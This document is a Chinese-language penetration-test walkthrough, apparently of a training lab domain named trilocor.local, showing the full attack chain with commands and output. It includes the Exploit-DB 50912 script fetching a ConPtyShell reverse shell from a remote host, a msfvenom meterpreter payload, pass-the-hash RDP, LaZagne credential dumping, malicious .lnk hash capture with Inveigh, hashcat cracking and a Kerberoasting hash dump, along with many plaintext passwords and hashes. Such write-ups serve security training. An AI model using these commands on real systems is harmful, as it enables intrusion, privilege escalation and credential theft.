Sticky Notes(便笺)是 Windows 操作系统自带的一款小型应用程序
1 PS C:\Users\pthorpe_adm\AppData\Roaming\Sticky Notes> cat 'StickyNotes.snt'
找到了 WS01 机器 IP 和 devtest 用户凭证
1 2 172.16.139.175:WS01 devtest:D3vel0PEr@123
WS01 Initial Access 测试端口是否开放
1 2 3 4 5 6 7 8 9 10 11 12 $ nmap --open -PE -Pn 172.16.139.175 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-20 22:41 EST Nmap scan report for 172.16.139.175 Host is up (0.37s latency). Not shown: 999 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 3389/tcp open ms-wbt-server Nmap done: 1 IP address (1 host up) scanned in 42.30 seconds
使用 xfreerdp 工具 RDP 到 WS01 机器
1 xfreerdp /v:172.16.139.175 /u:devtest /p:D3vel0PEr@123 /timeout:20000
Privilege Escalation 桌面上有很多应用
通过 searchsploit 每一个桌面应用,只有 Wondershare Dr.Fone 存在 Privilege Escalation 漏洞
版本也是 12
Expolit-DB 50912.py
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 import msgpackrpcLADDR = "192.168.14.129" LPORT = 1338 RADDR = "192.168.14.137" RPORT = 12345 param = f"IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell {LADDR} {int (LPORT)} " client = msgpackrpc.Client(msgpackrpc.Address(RADDR, 12345 )) result = client.call('system_s' ,'powershell' ,param)
修改
1 2 3 4 5 6 7 8 import msgpackrpcRADDR = "172.16.139.175" RPORT = 12345 param = "powershell C:\\Users\\devtest\\desktop\\priesc.exe" client = msgpackrpc.Client(msgpackrpc.Address(RADDR, RPORT)) result = client.call('system_s' ,'powershell' ,param)
使用 msfvenom 制作 windows/x64/meterpreter/reverse_tcp 文件
1 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.139.10 LPORT=54321 -f exe -o priesc.exe
在 ligolo-ng proxy 工具中中给 root@WEB-NIX01 添加监听器
1 2 [Agent : root@WEB-NIX01] » listener_add --addr 172.16.139.10:54321 --to 10.10.16.2:54321 INFO[10227] Listener 3 created on remote agent!
将 priesc.exe 文件上传到 WS01 机器
使用 Python 运行 priesc.py 文件
监听到 WS01 的反向 shell 权限为 SYSTEM
1 2 3 4 5 use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST 10.10.16.2 set LPORT 54321 run
hashdump
Credential Theft 使用管理员凭证登录到 WS01 机器
1 xfreerdp /v:172.16.139.175 /u:administrator /pth:0f280efc7d520ce6554f24f6ecee02d0 /timeout:20000
limit
在 MSF SYSTEM Shell 中设置为非禁用受限管理员模式
1 2 reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f reg query HKLM\System\CurrentControlSet\Control\Lsa | findstr DisableRestrictedAdmin
再次使用 xfreerdp 工具连接
上传 LaZagene.exe 工具到 WS01 进行敏感信息收集
以管理员身份运行 PowerShell,再执行LaZagene.exe
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 PS C:\Users\Administrator\Desktop> .\LaZagne.exe |====================================================================| | | | The LaZagne Project | | | | ! BANG BANG ! | | | |====================================================================| [+] System masterkey decrypted for 0af50e35-4750-4f0e-aca7-31f978e440f6 [+] System masterkey decrypted for 203dfb33-394f-41a1-b031-aa5aa00a852e [+] System masterkey decrypted for 402db628-9b6b-4e40-8926-fbfbb6bb6626 [+] System masterkey decrypted for 914e9895-ebe2-488b-9dd8-d3756a0940a3 [+] System masterkey decrypted for d963f089-8a32-4812-80c6-be17ae237f3e ########## User: SYSTEM ########## ------------------- Hashdump passwords ----------------- Administrator:500:aad3b435b51404eeaad3b435b51404ee:0f280efc7d520ce6554f24f6ecee02d0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:f3ad5d7948de33a7532f8c8665d2ced6::: devtest:1002:aad3b435b51404eeaad3b435b51404ee:0dec6c93cf0fb6306f72624ba6d92d0f::: ------------------- Lsa_secrets passwords ----------------- $MACHINE.ACC 0000 F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0010 2F FD 87 EE 54 A1 FF D5 21 19 F0 DE C1 0F 94 04 /...T...!....... 0020 34 2B D5 E4 39 58 EB 5F 8F 08 0D 97 1C 56 4F 14 4+..9X._.....VO. 0030 58 0E 86 FB C4 0B 20 E8 57 B7 B5 70 1B F9 23 34 X..... .W..p..#4 0040 02 D1 27 43 A5 C5 34 0C A2 EE 54 C6 12 3F 5A 75 ..'C..4...T..?Zu 0050 69 F9 6A 69 18 C8 B3 C6 11 63 49 DB 8C CD 45 60 i.ji.....cI...E` 0060 61 D8 DD C7 15 68 FF 91 F4 E0 6D 08 ED BF 52 43 a....h....m...RC 0070 64 F4 D3 7B B9 44 BD 50 C8 2B 8E 8F 46 E7 D6 9E d..{.D.P.+..F... 0080 3D 3C 03 71 F0 93 B7 ED F7 90 B5 80 0A 15 4C AC =<.q..........L. 0090 C8 B1 1B 1A ED 80 8E 85 E7 F6 26 DF 14 50 3A 9A ..........&..P:. 00A0 E4 A1 DD 80 9D 97 F2 26 AB 4B 9B 01 B5 09 39 88 .......&.K....9. 00B0 22 89 E9 BD E1 54 62 62 CA 04 10 C7 AD 74 19 BB "....Tbb.....t.. 00C0 77 3A 5F AA 46 B0 67 23 02 EA 4F 8E 99 10 16 98 w:_.F.g#..O..... 00D0 E6 8A 2B A6 2B 19 30 9A C6 91 8C F8 63 51 B0 0F ..+.+.0.....cQ.. 00E0 B7 92 F1 F3 7B D9 C2 D5 51 15 58 17 BE 02 AA C8 ....{...Q.X..... 00F0 38 62 74 44 6F F5 94 8C 9C DB B2 69 67 20 5A CD 8btDo......ig Z. 0100 21 3A 64 2F C7 AB 05 E9 97 2A 83 A4 2D 72 54 59 !:d/.....*..-rTY DefaultPassword 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0010 96 BA 43 0C 82 9D 7D 3D 82 F0 C1 BD 18 84 45 64 ..C...}=......Ed DPAPI_SYSTEM 0000 01 00 00 00 9F F3 91 7C BF 81 AC EB 14 C0 FC 5C .......|........ 0010 1F 89 65 0D E9 66 AE 69 19 73 69 86 E9 49 F8 6F ..e..f.i.si..I.o 0020 E6 28 F0 0A 73 DD 7D 47 F7 C8 A1 C6 .(..s.}G.... NL$KM 0000 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 @............... 0010 71 53 91 D7 14 74 CA 77 59 34 15 BF 0A 90 C5 21 qS...t.wY4.....! 0020 B3 AB 86 2E B6 7F 58 F5 DD B4 23 77 40 2E B7 36 ......X...#w@..6 0030 7B 00 37 B5 63 03 65 59 4B 5B 1F B2 B9 3F DA 1B {.7.c.eYK[...?.. 0040 1C 04 B1 69 7C 53 60 75 1A 4A 4E 0E 08 15 BD 77 ...i|S`u.JN....w 0050 77 5B 49 91 8D EC B9 01 92 77 6C F1 39 69 83 64 w[I......wl.9i.d ########## User: Administrator ########## ------------------- Credman passwords ----------------- [+] Password found !!! URL: 172.16.139.35 Login: pthorpe_adm Password: pTh0Rp3_R0cK ########## User: pthorpe ########## ------------------- Pidgin passwords ----------------- [+] Password found !!! Login: trilocor\pthorpe Password: -pl,MKO)9ijn [+] 2 passwords have been found. For more information launch it again with the -v option elapsed time = 8.420691013336182 PS C:\Users\Administrator\Desktop>
获得两组凭证
1 2 pthorpe_adm:pTh0Rp3_R0cK trilocor\pthorpe:-pl,MKO)9ijn
经查找发现 pthorpe 是域用户
Active Directory Credential Enumeration SMB 使用 pthorpe 域用户凭证枚举 SMB Shares
Evil lnk 共享目录 Print_jobs 可读可写,尝试使用恶意 .lnk 文件捕获哈希值,在 Server 2019 主机上,使用 SCF 不再有效,但我们可以使用恶意.lnk 文件实现相同的效果。
1 2 3 $ git clone https://github.com/Greenwolf/ntlm_theft.git $ cd ntlm_theft $ python3 ntlm_theft.py -g lnk -s 172.16.139.10 -f evil
将 evil.link 文件传到 Print_jobs 共享文件夹
将 Inveigh.exe 上传到 MS01 机器,捕获哈希
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 *Evil-WinRM* PS C:\Users\Administrator\Documents> .\Inveigh.exe [*] Inveigh 2.0.11 [Started 2025-01-21T04:07:00 | PID 648] [+] Packet Sniffer Addresses [IP 172.16.139.35 | IPv6 fe80::481:ec1:fd04:d15a%9] [+] Listener Addresses [IP 0.0.0.0 | IPv6 ::] [+] Spoofer Reply Addresses [IP 172.16.139.35 | IPv6 fe80::481:ec1:fd04:d15a%9] [+] Spoofer Options [Repeat Enabled | Local Attacks Disabled] [ ] DHCPv6 [+] DNS Packet Sniffer [Type A] [ ] ICMPv6 [+] LLMNR Packet Sniffer [Type A] [ ] MDNS [ ] NBNS [+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80] [ ] HTTPS [+] WebDAV [WebDAVAuth NTLM] [ ] Proxy [+] LDAP Listener [Port 389] [+] SMB Packet Sniffer [Port 445] [+] File Output [C:\Users\Administrator\Documents] [+] Previous Session Files (Not Found) [*] Press ESC to enter/exit interactive console [.] [04:07:15] TCP(8686) SYN packet from 172.16.139.35:50665 [.] [04:08:02] TCP(445) SYN packet from 172.16.139.3:60352 [.] [04:08:02] SMB1(445) negotiation request detected from 172.16.139.3:60352 [.] [04:08:02] SMB2+(445) negotiation request detected from 172.16.139.3:60352 [+] [04:08:02] SMB(445) NTLM challenge [23FFBC3FE00D751C] sent to 172.16.139.35:60352 [+] [04:08:02] SMB(445) NTLMv2 captured for [trilocor\jflemming] from 172.16.139.3(DC01):60352: [!] [04:08:02] SMB(445) NTLMv2 for [trilocor\jflemming] written to Inveigh-NTLMv2.txt jflemming::trilocor:42B35DF9AE649D73:B9D475EB51EFAC4A62719E2758A6644F:0101000000000000B60981EF7578DA017F90C785C0B1844300000000020010007400720069006C006F0063006F007200010008004D0053003000310004001C007400720069006C006F0063006F0072002E006C006F00630061006C00030026004D005300300031002E007400720069006C006F0063006F0072002E006C006F00630061006C0005001C007400720069006C006F0063006F0072002E006C006F00630061006C0007000800B60981EF7578DA0106000400020000000800300030000000000000000000000000200000C7C4ED2F83D44C91D2214FE705651BE05617D71928FFF824AB6AC491EF7E6DF40A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E003100330039002E00330035000000000000000000 <SNIP> [+] [04:08:02] SMB(445) NTLMv2 captured for [trilocor\bmarley] from 172.16.139.3(DC01):60363: [!] [04:08:02] SMB(445) NTLMv2 for [trilocor\bmarley] written to Inveigh-NTLMv2.txt bmarley::trilocor:23FFBC3FE00D751C:4F534651D5CF71226569A11CAAE6FD64:010100000000000083280D5BEC6BDB01577AA1B091D3C85000000000020010007400720069006C006F0063006F007200010008004D0053003000310004001C007400720069006C006F0063006F0072002E006C006F00630061006C00030026004D005300300031002E007400720069006C006F0063006F0072002E006C006F00630061006C0005001C007400720069006C006F0063006F0072002E006C006F00630061006C000700080083280D5BEC6BDB01060004000200000008003000300000000000000000000000002000003DE6BC6F74F3C9C49DC09181258728FAD24CCBCFFF8B1D6D7E92BC2C3189B5E90A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E003100330039002E00330035000000000000000000 <SNIP> [!] [04:08:02] SMB(445) NTLMv2 for [trilocor\bmarley] written to Inveigh-NTLMv2.txt [!] [04:08:02] SMB(445) NTLMv2 challenge missing for trilocor\gmarley from 172.16.139.3(DC01):60385: gmarley::trilocor:0F71DA759119AB8E:F6B5CF6E97C1DD891E414E676F524CE7:010100000000000079F81BB5AE75DA0168CF09EDD23FF6B700000000020010007400720069006C006F0063006F007200010008004D0053003000310004001C007400720069006C006F0063006F0072002E006C006F00630061006C00030026004D005300300031002E007400720069006C006F0063006F0072002E006C006F00630061006C0005001C007400720069006C006F0063006F0072002E006C006F00630061006C000700080079F81BB5AE75DA01060004000200000008003000300000000000000000000000002000005D7330836EAA4643EBFC087C82C7787A5515DC0187E0F6968755AA01EFBDB59C0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E003100330039002E00330035000000000000000000 <SNIP>
使用 hashcat 工具破解 hashes
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 $ hashcat -m 5600 jflemming.hash /usr/share/wordlists/rockyou.txt <SNIP> JFLEMMING::trilocor:42b35df9ae649d73:b9d475eb51efac4a62719e2758a6644f:0101000000000000b60981ef7578da017f90c785c0b1844300000000020010007400720069006c006f0063006f007200010008004d0053003000310004001c007400720069006c006f0063006f0072002e006c006f00630061006c00030026004d005300300031002e007400720069006c006f0063006f0072002e006c006f00630061006c0005001c007400720069006c006f0063006f0072002e006c006f00630061006c0007000800b60981ef7578da0106000400020000000800300030000000000000000000000000200000c7c4ed2f83d44c91d2214fe705651be05617d71928fff824ab6ac491ef7e6df40a001000000000000000000000000000000000000900240063006900660073002f003100370032002e00310036002e003100330039002e00330035000000000000000000:$$Bond@007$$ Session..........: hashcat Status...........: Cracked Hash.Mode........: 5600 (NetNTLMv2) Hash.Target......: JFLEMMING::trilocor:42b35df9ae649d73:b9d475eb51efac...000000 Time.Started.....: Tue Jan 21 02:43:04 2025 (15 secs) Time.Estimated...: Tue Jan 21 02:43:19 2025 (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 979.3 kH/s (0.43ms) @ Accel:256 Loops:1 Thr:1 Vec:4 Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new) Progress.........: 14329344/14344385 (99.90%) Rejected.........: 0/14329344 (0.00%) Restore.Point....: 14328832/14344385 (99.89%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidate.Engine.: Device Generator Candidates.#1....: $$mom11121979 -> $$$@@@ Hardware.Mon.#1..: Util: 88% Started: Tue Jan 21 02:42:49 2025 Stopped: Tue Jan 21 02:43:20 2025
BloodHound 在之前的 MSF WS01 SYSTEM Shell 中,将域用户 pthorpe 添加到本地 Remote Desktop Users 和 Administrators Group
1 2 net localgroup "Remote Desktop Users" trilocor\pthorpe /add net localgroup Administrators trilocor\pthorpe /add
使用 xfreerdp 工具 RDP 到 WS01 机器
1 xfreerdp /v:172.16.139.175 /u:pthorpe /p:'-pl,MKO)9ijn' /timeout:20000
关闭防火墙
上传 SharpHound.exe 收集域信息
使用 Python 启动一个 HTTP 服务进行文件传输
上传 PowerView.ps1 脚本
1 iwr http://172.16.139.10:2222/PowerView.ps1 -o PowerView.ps1
PowerShell 的执行策略不允许运行脚本
1 2 3 4 5 6 7 8 9 PS C:\Users\pthorpe\desktop> Import-Module .\PowerView.ps1 Import-Module : File C:\Users\pthorpe\desktop\PowerView.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at https:/go.microsoft.com/fwlink/?LinkID=135170. At line:1 char:1 + Import-Module .\PowerView.ps1 + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : SecurityError: (:) [Import-Module], PSSecurityException + FullyQualifiedErrorId : UnauthorizedAccess,Microsoft.PowerShell.Commands.ImportModuleCommand
修改执行策略
1 Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process
GenericWrite 检索发现 jflemming 域用户所属 HELP DESK MANA 组对 ksalinas 域用户具有 GenericWrite 权限,利用此权限,可以在 ksalinas 帐户上设置虚假 SPN,并执行有针对性的 Kerberoasting 攻击
在 ksalinas 帐户上设置虚假 SPN
1 2 3 $SecPassword = ConvertTo-SecureString '$$Bond@007$$' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('trilocor\jflemming', $SecPassword) Set-DomainObject -Credential $Cred -Identity ksalinas -SET @{serviceprincipalname='nonexistent/BLAHBLAH'} -Verbose
执行 Kerberoasting
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 $ impacket-GetUserSPNs trilocor.local/JFLEMMING:'$$Bond@007$$' -dc-ip 172.16.139.3 -request Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation -------------------------------------- ------------ ------------------------------------------------------------- -------------------------- --------- ---------- adfsconnect/azure01.trilocor.local azureconnect 2022-07-26 08:35:20.785080 <never> backupjob/veam001.trilocor.local backupjob 2022-07-26 08:35:23.910089 <never> MSSQLSvc/DB01.trilocor.local:1433 mssqlsvc 2022-07-26 08:34:58.941340 <never> MSSQLSvc/DEVTEST.trilocor.local:1433 sqltest 2022-07-26 08:35:11.410091 <never> MSSQLSvc/QA001.trilocor.local:1433 sqlqa 2022-07-26 08:35:14.456963 <never> MSSQLSvc/SQL-DEV01.trilocor.local:1433 sqldev 2022-07-26 08:35:07.988210 <never> MSSQLSvc/SQL-WEB01.trilocor.local:1433 mssqladm 2022-07-26 08:35:17.769457 <never> MSSQLSvc/SQL01.trilocor.local:1433 svc_sql 2022-07-26 08:35:02.035096 <never> MSSQLSvc/SQL02.trilocor.local:1433 sqlprod 2022-07-26 08:35:04.800708 <never> nonexistent/BLAHBLAH ksalinas CN=IT Support,OU=Security Groups,OU=Corp,DC=trilocor,DC=local 2022-07-26 08:34:42.691340 <never> SAP/APP01.trilocor.local sapsso 2022-07-26 08:35:30.128840 <never> SAPsvc/SAP01.trilocor.local sapvc 2022-07-26 08:35:32.863210 <never> vmware/vc.trilocor.local vmwarescvc 2022-07-26 08:35:27.050724 <never> [-] CCache file is not found. Skipping... $krb5tgs$23$*azureconnect$TRILOCOR.LOCAL$trilocor.local/azureconnect*$87ff8cd50df0288915c8e81e9582797c$9aea67e951da8e1105c1a6cc103ec52dd6f203afa960f196d03d1fd731cd97bd5dcfaa4aa426c89ca8f11364acce5aa0ba39d55d7cb6514212bb2e985cc3bcbf8ee15212ec778d8c3ebc8a9d0693095a4463b7ba03f80790cf103d5e685fb29c87de1fed2d184e1cc9f2e63221c7473f824789808b47d3ca97e4b3f2f59f1b9be34a73a253053ec696a4c7d36e8dbbe7feff57c4d1dbad223c009a76b1ab3569e2a15bf9e4fa1505d0a004c864d608364fb4973288ec96673ada50bc2e2d48504da6ed28d06580aa6221f5a96704aa535ff392dc5b2790b04b4adff52418a351eaafa46226ec6185912c4b574596449dbd7909c12c4ad51574adc2ac057fb5a226d82f1f239997a2100ab0397c81ec4272d7cfdffcd0a34b609f66a633e579fa62b13cc0e9a688c2ff7e73d549d7190addb2cff580487012c6b17852a99d14fd3c09edd7c2e330756e6b2f699b23c02ed8c52cbe06b5fc04d42cdcdffa235542e89dea34ad7d1982dbd94bfe063672bf2ea15cd3f693f90519a4ee921dac48efc2e9636dcc015b55a8d9028b75c7b6bd5629d9b152aafd9ee4f4924a7c38e58bc963851c2ac4e40086540f45a589e9d58895750bcee3cff0686f9008787a466c91f0fe7c506b264a0e82912b587e977f2f2dc664b6f47c098f0e4953c86d3b86e680dfbe44d998096a8ffb5bfd5c8952849d211df6e8b31408e0278b9242e09394a22463e7bb4e284504897fea4439f60802d668122691c1b5f98474ecd90c99957537019333afb473367686ef7086f53297fcb5292eba975a53c0e1500f5a2376ccaeee7728577dbec91ddd4b75e197a1ee201f438531d1580f184b599c436e69f26100f9f5a6d610182b30d15245727969fa1e113d61e3b8bd00f94a7bc33e20f414f51fd42824d11566a794ce96d18273c523ca8994ff8c595617650eba0f16a66283757f7b4b2ad28c96bf75a624211b5d9131b2266e372b241da88fe4a8026930a8713b361d8f484f59ef23883d09174fe679699d7ddc351174ae38651ace3cee410c84196f99af81d396413a6c1db6915b5423343cb8938c88f8b6be34915a040ecbfd0bdb128b4b6b22d6a6bdbd47d558eb679fe0271dad0c0889e438c1f7c7496a9bdf5ac0f540d246e3f24c76cb0f2c568e0334daa678d9c92ed24f0871d63dd722ad53d387e2a9a1808ef31f8480422e5ac9bcbd5fd1f039de45d7bc6613612091bb10be9ac9ef38b8e83144b793795da21c4e6a9944934ac58e27f5cd17584a035ec9a8d9bb4a975869cfb1ac49be38272e39f930120e503724fd7a0d270d76c4ac79cebd2aa4a9bec5bbb7591893c78323f75dda179164c37c8db984384eec90439ea6f272088ed4047bd051c9d88c72339d1e64b9970cfebe0673428258911ce3937e72ccce7480c00806a87be8045b2a878aaae735beb6fc8d27ba741c519fe6f8d02477654b553318 $krb5tgs$23$*backupjob$TRILOCOR.LOCAL$trilocor.local/backupjob*$3156904289a1aba18c5ece3c4f30d439$7cf702b62bd10ce6046637f78eed1940ac8cf9d6b05727935b1142c18863b67914e42a7536100dc884e8937acf7bf70b37d37b51b986b8e03362651405b151b0915ea4850a4bf30bae79828a1923f7e212fec69cdeeb5344f9df00fc6e54a1960a99c810ba5f604a49717d14c89586c039168d4e342ebdb9fe02d84dc743dd37185b78889e63bf2bf86fbf87201522473400683328567516a5cdbb5d44136060d3a7326a785f81b045603628bebd27eba96aa0e518d2d96639120fccb900772829b31d986fbc98f2ec5e878d5b8c915491ea0068405cb99530c3d1eedc5c5116f84bb9578fa861eaeb5f4bc8bbbeea39096dd04ec5cc5941768ba748cffaa8e9f3edbc5eeaba8d0a48667cf87d08e1509742cf5c6ef614179c1e891af61d2a2b82fd38db2e67e8ed9eba228d37a64e56b8f79d4a7583198989961ef7e225b4fbc27e7f0b165119bf3949720d90d7f4f205673e9871cff2bab54b53448fb55a71e1ed5f7e84d2f8fcde123209d2244bfb2decab35b4045802a9e1d31fb3d07d781d64bc15f3dfc6a6d2dab789609322004e7422b4ec2648343b5efbe46c1feefb9883aacaea8284e2a751c0091ecf3b0eed83e36cb56bc66dcac50bc288ef214918ba867e858ee9844fbf4784eb4539a490f999eae1fc89f94074d061b878980386eec59610014318a29e472134e3ec2975924c9b4433ee47e20440f15bea6d0382e41ed38fe2a290e606b191c91ea64e2f8dc63c9ab88c5958deb0b0396c29f330a5e831b40c6227850cfda39083ae8e9b79a13db857f7e371f2786dfe4c81a2b4443d6fc4a984bb2ea514bd08bf7429a5b77bf0001d753401e84b1054560ce55859fde13f012f6915d036facf5b977bda2bf6281462db9d7885497b5b65218f01ef54a571637e99b9934bce8fda79b8c1289e4e8a124bfd314c66c631c835a98792470fe72700a870cb0fe7d495902d92ef982a4d242a5ecbffd8d997ccbc58683e822eadb1a4e529bd90b3ce4523fe27299314baf6971c37934506265a562bbe70ca5ebc9276e5e4e6c6ee0176f6d7dcb4e51cb6c7684ba10e67572266ff8d6a6a9bdbf65e9f5180f844871dbb953728a85b45e91e0008f5f8130e75fb827ac54ee0c476006342c7f3d5f5e76d5df7f73a251adb6957bf73e22e9aefdd1a4c400988e6e8ec729aa9c92d1805ede83e2b4aa2c67e0b52ef4a6d9cf30638fdd32eef2308c93cf4e26552d440fa0a3e4afc00da708da0465aeb29b421056c3d96710b994d957bf436a85c7137422f0fb0f6f2ffcb0111640beb43d5dfe449d7f08333d3e2d1f40a56b9b6e9116993d3c1de55c23564bfb9cf662a0a81956f9aaba8c4c7a9e57fa984583c872841d566bd39fc60390b4cf1804b5ac94dbf895ab995ecdbcfed46f8267879ce1778e0dac81120f320360269f4056420337ade1464e29e753c0f3c9f10bcb6bfe21c065d46 $krb5tgs$23$*mssqlsvc$TRILOCOR.LOCAL$trilocor.local/mssqlsvc*$bd10f43bedea1d55144705a06da41873$fb4212be4927e767ea7b082aa948efb459c49b40e46b238d2153a60f859a02a63a460025fe4cb90ddd2717cc5a79df7584f9c158f6f6a54f93933be819094509a05f49df459aac6b9bd4dbfa84394d06a3b4273d348ac7ec354db711cbeb76de15bdfccf9323f84f46b7911500001ca795fa6c95f7a192070b3335c6110d4449bfd01a979c33b21a46d982ae262785ad760169d11a08a6851d9da91bba2b4fe67bd2e8c477a2fd49d16c7439dc95f9908d9d45cf616140305431777a359c68b01e108b21959438bc3d49625ef9758b5b257557c79ea26092f1c11c59833bb4e45c7cf474247c85c687228722e2c5913877c764c2ad11f6899db17654de58a010d8d62f5223d4b5703788488c8d3587ab3fde32b3a00b6fee0090ee5a674c4029cc2e27199d8b93dc509c2a2f6ee0a5d269f20e68fb0f7baef675d71d5532c8200e40b80234d51056b193a761a9048fb7afa37e00512130e17bf9d14323bd2cd2fb07ac611a866009c3b3d6071c2b73d5fe75ea294f13a1ad273c41650e40f0a2d5ca3634d7ab9486491c204abc5facbe6fc0d4f0110011e8ed318d1cb970848f600a81cd296f07e4f05dfe3d5397a4965d83011af25092752800fc3d1dc4209b3bbd24b5aaba35543b092f7aefde87c349ff97cefff0b2f6a2d8182ae76b7cde4fec92fbf9728f0d1f953dcccbd63e2d89abbd60603643d03db3366287cc4a797b92663b708184d7e7680734edfe2259f89120f284218a6d8e47d777c13547c83444a4ca7c6319ffba85be05ea244ebc7bfbcd45b0f3b7f4baadc2e26064ed89cabd3ce344e1a2c76d51ff90790fa1e37756663a0fa00484d5fd99c2364a1274c370ae6443c4f6f773df9f964bff78dc1c7d18c72342f13b51ea24d6535233ab23dd8d45feddaa52d28d288634d1c030ef9ca98495fc15c8c4046fd057db547ae7ed829444fd0280d72eeb6378db17e16181d2f3370fbe852ad0f3b15d67ee978cee07487e775fdac635ce67369445b41349bc9f8264113a6d46ceb9a8e65a283a36cff90f75b2ad6972ca43775d79ec838550fa5c0900a063f2b13e63f6c4a28bdb40f65e342a16d84cd7c7d6fa63c4e2ac98b21db27bee8434dc36575f898de8dc3e6d71acbb4fed51dd58c04e781cfc19d52f00213f79bff4d7fa23f21329707289cfea5a9104c6bdbefd9a0db4ff4a97b92f2a0d1f9e59e53572d011e49e95c6911bb3800cca4d5ea3174f0429ad296af0439505b1967f152524892827a7c7b9bdc819a5bfb31ba18941228ae83031f508af5a0f5111e9da83e23478f638069aec6fd1865ef37207270503344bdb5525a4b0c3549f7cb52a604811ce5ca65b2dbe1f3d70d4d959c1b0a2e36d5714e154b4d9200956c69fcb5ecdabbbc0210b36553d55e7fe3ce6c6ff2c5af1c1fdb8a56e691627cd3ce5522e6ce6cd59fc64d2895b5136c3b045cf04aac5f0f9af $krb5tgs$23$*sqltest$TRILOCOR.LOCAL$trilocor.local/sqltest*$652d3167b249d3aa05c69519540f10e7$7e755916b31997f9de096aceec68bea5ec1559cb5a7d5d342fcf7f305fdf8bb9f911766a72e740f54b01daac091e2e6b38f7773d3efde92dbf9be230b9897b64ff72fdccc1d47cddf1605c0d8c290e6ae364ea7b0b9114e91120191c5af287e6643fc8e73742c3402ac2537d34e52c3ea5d4c212b78c785dc60d90a430d86ae0fde6cbb2fde96817f4a6204fa4771d26bcbce0bed43f269dc67fdfe9196d3710a8bc8e1a96c7c1b989ae9a8a748fefcc260178e2142f2d722ac65dfd27663866b023db025d72f4a57346e6d94b5a009d66b23b66d4155f008c84c9385001e046b6cf8d239fc1301f1c7f0a258afc50fa1d0b82e5caee44cf9fcb6934461d12055d2f7b8d25ecab0dafb2cb9734cc665aabddb084ddd69b715868a757a4f0638f5eae0acece1efad0d1cc8d89fb218f46f8ed45233b8aede0a3bc56739d3c5190bf372b7282922845628ccda84a4750f1b975a9121dd6c33d978a866867bf51c3ba79854dbf66c7e294943e8ebcf064ebe9ab24c7eecf4c00c60d3f18eb31506363495b1c8c6c01676cad19e6be5502db0abdaf0b6fb23a458abef7d1c1bbdfccc980e7a19cb99c9d3fed56b7076d9d4b39b2bb7e8678c577777be1a3f7c1d835410d2086945b1d5859e71870ca170479590387a547560564ef487e923d945e1c110e5b3b5b9ded523cb26dd040d6595ce4b2136084251a29eca522d8e5629af779256c82b5a2cdb67fb1ffee8841b90f146ac7ca62123a39c81e3759459f58ccb9de58d425c7694d82bcae930a3e3d9ee543c2e87e5e32b59d0e6ed19cf2785c25aed87525c07704b1eec497acdfa2d0e0f0e7654ad2ab66f423b1f1eeeea02082bca140b4499796065933e297c795a218cbb932e7199e642c3a00e89330ef1236b71833c4a9dac594d1e8dfcdc9ff5d3f89bbec8ccecf20950d219fa6c25d2f28f9e0f622f47a7ba29be420238fdbfecdb7d94a7dd62822d1d7214cd417015d69ac8ad999ce0b64eda6dc97bcc25dee3153f3edc772b318bb290a43deadde39adb38e0791a05cda920d88f30add2ebf1825371a959e038eaf9d3332a3d89d5c739a45423e464d0a09bd1461a85c03209534d610a7082b2f00a3d70f5929254a223c01d7cee839417acf3db5d65f41d2d10d957f0f3af7d7195b419facdd2e04e81c690c83334f33bb9d15f86aa0217832825cf292c1d1299ebf408a51605f78bffd8de489ed9880f3cb3faf53969c0e02a288a7bd7062b3b80d288dcf3b590302871c534e00933899fd2accd8289bcff3f16595f4edc45666354b6d3c3cfc43ea96432d8bba22073866ad2a560bccac3ab008bcacd40ff249c13a910a944b4eda374a403bd12924365132a45fc8ac3c97295758ae5e74402245ab17b6779d0dc0bac4200adfe6394eb02bf9f2f4d6f9c46d9f2e66d3b3b3f0b0ce6344c8a6ea936ae04eded23df98356e0ffb5b7a6c0 